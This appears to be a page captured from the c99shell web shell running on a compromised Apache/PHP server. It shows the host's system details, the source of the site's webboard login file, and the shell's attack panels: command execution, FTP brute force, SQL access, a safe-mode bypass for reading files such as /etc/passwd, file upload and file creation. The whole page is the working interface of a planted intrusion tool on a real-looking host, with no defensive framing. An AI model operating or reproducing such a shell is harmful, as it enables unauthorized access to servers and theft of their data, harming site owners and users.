!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/webboard/   drwxr-xr-x
Free 52.37 GB of 127.8 GB (40.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     memberlogin1.php (1.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<html>

<head>

<title>Member</title>

<meta http-equiv="Content-Type" content="text/html; charset=windows-874">

<style type="text/css">

<!--

.style3 {

	font-size: 18px;

	color: #FF0000;

}

-->

</style>

</head>



<link href="./style.css" rel="stylesheet" type="text/css">





<body bgcolor=#FFFFE0 background="pic/bg2.gif">

	<?

include("config.inc.php");

include("header.php");

include("function.php");



if(empty($Category)){

			echo "<center><br>";

			echo "<font color=red size=+1> กรุณาระบุ Category ให้ตรงกับที่ web เปิดใช้ด้วยครับ</font>";

			echo "<br><br>";

			echo "<font color=red size=+1><b>[</b> <a href='javascript:history.back(1)'>กลับไปแก้ไข</a> <b>]</b></font>";

			echo "</center>";

		exit();		

	}

	else {

		$Category = CheckCategory($Category);  // ตรวจสอบว่าเป็น Category ที่อนุญาตหรือเปล่า

	}

?>

       <p>

         <script language="JavaScript">

		function forGot(filesname) {

			props=window.open( filesname, 'poppage', 'toolbars=0, scrollbars=0, location=0, statusbars=0, menubars=0, resizable=0, width=400, height=400' );

		}

	   </script>

	     </p>

       <center>

	<span class="style3"><b>แก้ไขข้อมูลสมาชิกเว็บบอร์ด</b>

	</font>

	</span><br>



	<form method=post action="editprofile.php?action=login">

	<table border=1 width=230 bordercolor=#1E90FF bgcolor=E0FFFF cellpadding=2 cellspacing=0>

	<tr><td>Username</td><td><input type=text name="uid" size=20 maxlength=20></td></tr>

	<tr><td>Password</td><td><input type=password name="pwd" size=20 maxlength=20></td></tr>

	</table>

	<br>

	<input type="hidden" name="Category" value=<?echo $Category;?>>

	<input type="hidden" name="page" value=<?echo $page;?>>

	<input type=submit value="Log in"> 

	</form>

 <a href="javascript:forGot('forgot.php?Category=$Category')">ลืมรหัสผ่าน</a>

	<hr color=1E90FF>

	

	</center>

</body>

</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--